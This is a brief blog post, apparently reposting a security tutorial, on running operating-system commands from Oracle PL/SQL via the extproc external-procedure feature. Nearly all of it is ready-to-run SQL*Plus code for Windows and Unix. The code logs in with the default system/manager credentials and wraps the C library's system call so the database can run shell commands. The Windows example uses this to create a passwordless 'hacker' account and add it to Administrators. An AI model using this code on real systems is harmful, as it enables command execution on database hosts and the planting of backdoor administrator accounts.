Monday, September 4, 2017

Run OS commands via PL/SQL and Extproc


Documented way to run OS commands

Requirements
  • Running external procedure (extproc) in the listener
  • Create any library
  • Create (any) procedure
  • 9i+: Environment setting containing the special DLL/Library
    ENVS="EXTPROC_DLLS=ONLY:/home/xyz/mylib.so:/home/abc/urlib.so, EXTPROCT_DLLS=ANY

Code (Windows):

sqlplus system/manager
SQL> CREATE OR REPLACE LIBRARY exec_shell AS 'C:\windows\system32\msvcrt.dll';
SQL> CREATE OR REPLACE package oracmd 
is procedure exec(cmdstring IN CHAR); 
end oracmd;
/

SQL> CREATE OR REPLACE package body oracmd IS
procedure exec(cmdstring IN CHAR)
is external NAME "system"
library exec_shell
LANGUAGE C; 
end oracmd; 
/


Create new Windows Administrator
SQL> exec oracmd.exec('net user hacker nopassword /ADD');
SQL> exec oracmd.exec('net localgroup /ADD Administrators hacker');



Code (Unix):

sqlplus system/manager
create or replace library exec_shell
as
'/lib/libc-2.2.5.so';
/
create or replace package oracmd is
procedure exec(cmdstring IN CHAR);
end oracmd;
/

create or replace package body oracmd is
procedure exec(cmdstring IN CHAR)
is external
name "system"
library exec_shell
language c;
end oracmd;
/
SQL> exec oracmd.exec('ls');
hello_oracle.txt
PL/SQL procedure successfully completed.

 http://www.red-database-security.com/tutorial/run_os_commands_via_extproc.html
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Man in the Rain